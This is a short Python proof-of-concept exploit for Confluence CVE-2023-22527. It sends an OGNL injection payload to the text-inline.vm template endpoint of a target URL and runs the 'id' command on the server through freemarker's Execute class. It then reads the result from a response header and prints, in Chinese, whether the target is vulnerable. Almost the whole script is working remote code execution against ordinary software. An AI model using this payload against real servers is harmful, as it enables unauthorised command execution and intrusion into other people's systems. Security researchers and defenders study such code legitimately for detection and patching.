Confluence-CVE-2023-22527.py

#!/usr/bin/env python3
#-*- coding: utf-8 -*-
#author: myh0st@xazlsec


import requests
import urllib3
import sys
import time
import json
import re

urllib3.disable_warnings()

def verify(site):
    burp0_url = site + "/template/aui/text-inline.vm"
    burp0_headers = {"Accept-Encoding": "gzip, deflate, br", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {"label": "\\u0027+#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})+\\u0027", "x": "@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({\"id\"}))\r\n"}
    r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False)
    if "X-Cmd-Response" in r.headers:
        return r.headers["X-Cmd-Response"]
    return ""
    
if __name__=="__main__":
    target = sys.argv[1]
    info = verify(target)
    if info != "":
        print("[+]漏洞存在，执行命令 id 的结果为：", info)
    else:
        print("[-]漏洞不存在")